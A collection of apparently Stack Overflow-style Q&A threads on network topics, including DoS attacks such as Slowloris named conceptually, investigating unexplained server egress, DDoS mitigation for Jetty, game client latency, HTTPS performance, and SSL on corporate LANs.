I noticed that most dos attacks basically exhaust the bandwidth. So is there any DOS attack can shut down the target's server without exhausting target's network resources?
That kind of attack is based on vulnerabilities in the server implementation.
One of the awesome ones is Slowloris, which attacks the single-connection-per-thread design of Apache.
Related
Our Network egress charges are growing month on month. Going by the cost, we are egressing upwards of 800GB in a month, to the tune of 300KB/s on avg (600Kb/s daytime and 200kb/s night time)
I analyzed all possible scripts which are sending out data. But none of them is sending out data at this volume. I turned them off one by one but it didn't make much difference.
I momentarily turned on VPC logs, downloaded and analyzed the logs.. it is all distributed across IPs.. about 300 different IPs in a min with average of 10-12kb so about 33Mb/min. there were no IPs which stood out.
I noticed most of them using port 443.
When I use nethogs to identify the process which is doing most of the egress.. it only gave Apache & only showed me 50Kb/s. Where is the rest of the egress??
I mooted the possibility of a DDoS attack but that should show up in the Apache access logs. Apache access logs do not show any suspicious IP/url.
Looking for hints/direction I should take. Apologize if I am missing to give any crucial detail for you to analyze the issue. I will keep adding more details to the question.
If you suspect the DDos attack happened already i would recommend to use the Cloud Armour but before that see if you have followed all the mitigations to avoid the DDos attack.
https://cloud.google.com/files/GCPDDoSprotection-04122016.pdf
What you're experiencing is most probably a DDOS attack just as sankar wrote.
According to you nothing stands out particurarily in the logs which makes DDOS theory more probable.
Using Cloud Armor seems the easiest way to protect your server/app out of the box without too much effort since one of it's key features is Adaptive Protection;
Google Cloud Armor Adaptive Protection helps you protect your Google
Cloud applications, websites, and services against L7 distributed
denial-of-service (DDoS) attacks such as HTTP floods and other
high-frequency layer 7 (application-level) malicious activity.
Adaptive Protection builds machine-learning models that do the
following:
Detect and alert on anomalous activity
Generate a signature describing the potential attack
Generate a custom Google Cloud Armor WAF rule to block the signature
This way you will be able to avoid most of that kind of attacks and save money. Even the fact that you pay for this feature should be beneficial to you in terms of money - not to speak that your server will be a lot more secure and you can focus more on other things.
---------- U P D A T E --------------
There may be one more reason.
A rootkit typically patches the kernel or other software libraries to alter the behavior of the operating system. Once this is happening, you cannot trust anything that the operating system tells you.
This way typical tools won't show the traffic or any suspicious processes.
Have a look at the list of tools that may be helpful to detect any rootkits.
Currently Jetty has DOSFilter which appears to be providing protection against DOS attack i.e. it keeps track of number of requests from a connection. In DDOS attack, we expect attack could be from millions of ip addresses and in that case DOSFilter won't do the job. Any other strategy you could apply here so that Jetty could survive ?
Dealing with millions of IP addresses ...
This would need to be solution before the connection is accepted. some kind of OS or network hardware solution.
Jetty, being a server, has to accept the connection in order to do anything with it.
You could probably use the Jetty request log and a custom fail2ban setup to ban IP addresses at the OS level based on some kind of criteria in the access log. (too many requests on a connection over X amount of time, triggering an IP specific DOSFilter action, ban that IP at the OS level for Y amount of time)
If I have a server running on my machine, and several clients running on other networks, what are some concepts of testing for synchronicity between them? How would I know when a client goes out-of-sync?
I'm particularly interested in how network programmers in the field of game design do this (or just any continuous network exchange application), where realtime synchronicity would be a commonly vital aspect of success.
I can see how this may be easily achieved on LAN via side-by-side comparisons on separate machines... but once you branch out the scenario to include clients from foreign networks, I'm just not sure how it can be done without clogging up your messaging system with debug information, and therefore effectively changing the way that synchronicity would result without that debug info being passed over the network.
So what are some ways that people get around this issue?
For example, do they simply induce/simulate latency on the local network before launching to foreign networks, and then hope for the best? I'm hoping there are some more concrete solutions, but this is what I'm doing in the meantime...
When you say synchronized, I believe you are talking about network latency. Meaning, that a client on a local network may get its gaming information sooner than a client on the other side of the country. Correct?
If so, then I'm sure you can look for books or papers that cover this kind of topic, but I can give you at least one way to detect this latency and provide a way to manage it.
To detect latency, your server can use a type of trace route program to determine how long it takes for data to reach each client. A common Linux program example can be found here http://linux.about.com/library/cmd/blcmdl8_traceroute.htm. While the server is handling client data, it can also continuously collect the latency statistics and provide the data to the clients. For example, the server can update each client on its own network latency and what the longest latency is for the group of clients that are playing each other in a game.
The clients can then use the latency differences to determine when they should process the data they receive from the server. For example, a client is told by the server that its network latency is 50 milliseconds and the maximum latency for its group it 300 milliseconds. The client then knows to wait 250 milliseconds before processing game data from the server. That way, each client processes game data from the server at approximately the same time.
There are many other (and probably better) ways to handle this situation, but that should get you started in the right direction.
I am trying to implement web service and web client applications using Ruby on Rails 3. For that I am considering to use a SSL but I would like to know: how "heavy" is it for servers to handle a lot of HTTPS connection instead of HTTP? what is the difference of response time and the performance at all?
The cost of SSL/TLS handshake (which takes most of the overall "slowdown" SSL/TLS adds) nowadays is much less than the cost of TCP connection establishment and other actions associated with session establishment (logging, user lookup etc). And if you worry about speed and want to save any ns of time, there exist hardware SSL accelerators that you can install to your server.
It is several times slower to go with HTTPS, however, most of the time that's not what is actually going to slow your app down. Especially if you're running on Rails, your performance scaling is going to be bottlenecked elsewhere in the system. If you are doing anything that requires the passing of secrets of any kind over the wire (including a shared session cookie), SSL is the only way to go and you probably won't notice the cost. If you happen to scale up to the point where you do start to see a performance hit from encryption, there are hardware acceleration appliances out there that help tremendously. However, rails is likely to fall over long before that point.
Inside of large companies, is it standard practice to use SSL (e.g. https) for running corporate apps over the LAN. I am thinking of ERP systems, SFA systems, HR systems, etc. But I am also thinking of SOA...web service providers and consumers.
In other words, is there any concern that something on the LAN could be sniffing plaintext info going around? If not SSL, how is this security threat dealt with?
What's your experience?
Inside of large companies, is it standard practice to use SSL (e.g. https) for running corporate apps over the LAN.
Generally SSL for LAN only internal applications is not common practice. Historically the LAN has been viewed as a "trusted" network, and so SSL for LAN apps hasn't been a priority.
Also, connection to internal application servers is usually via an authenticated proxy, which in itself mitigates some of the risk.
This is, slowly, changing however as organisations (generally) increasingly treat the LAN with less trust.
If not SSL, how is this security threat dealt with?
Most enterprises do monitor what is attached to their LAN and record events when new devices are added.
If the device doesn't correspond to something planned (i.e a new desktop or printer) - then it is investigated.
Unauthorised devices are seen as a much greater risk (than not using SSL) because they pose additional threats, like introducing a virus, an external network connection, or some other kind of attack vector.
It really depends on what you consider a "large company". The company I work at has over 50,000 employees; thus our corporate network is really not a great deal more trustable than the Internet.
We do use SSL on corporate Intranet web applications. We have our own internal CA certificate installed on all corporate PCs, so we can issue our own internal SSL certificates in-house.
Unfortunately, no it's not standard practice.
What's done and what should be done are not necessarily the same here...
Without a doubt any system with confidential information should be secured, especially on a LAN, as that's where most attacks originate - disgruntles employees etc etc.
unfortunately, it's often not the case.
Yep, pretty standard practice in a lot of places I've seen.
I think the reasons why should be obvious:
Extra security against common attacks
Pretty much no reason not to
Inside of large companies, is it standard practice to use SSL (e.g. https) for running corporate apps over the LAN. I am thinking of ERP systems, SFA systems, HR systems, etc. But I am also thinking of SOA...web service providers and consumers.
I would feel very uncomfortable if such apps weren't secured. In many place I've worked, they were. In some other, they weren't and I consider this as unprofessional.
In other words, is there any concern that something on the LAN could be sniffing plaintext info going around?
For me, the answer is obviously YES.
If not SSL, how is this security threat dealt with?
One Time Password (with RSA SecureID).
I wonder if one of the problems is that going to SSL always seems just a bit more complicated than it should be. If one could enable SSL with a single switch without having to worry about certificates perhaps at least the encryption part could become default.
Obviously you wouldn't get endpoint authentication without taking the extra step of setting up certificates, but then at least there would be truly no reason to go without encryption.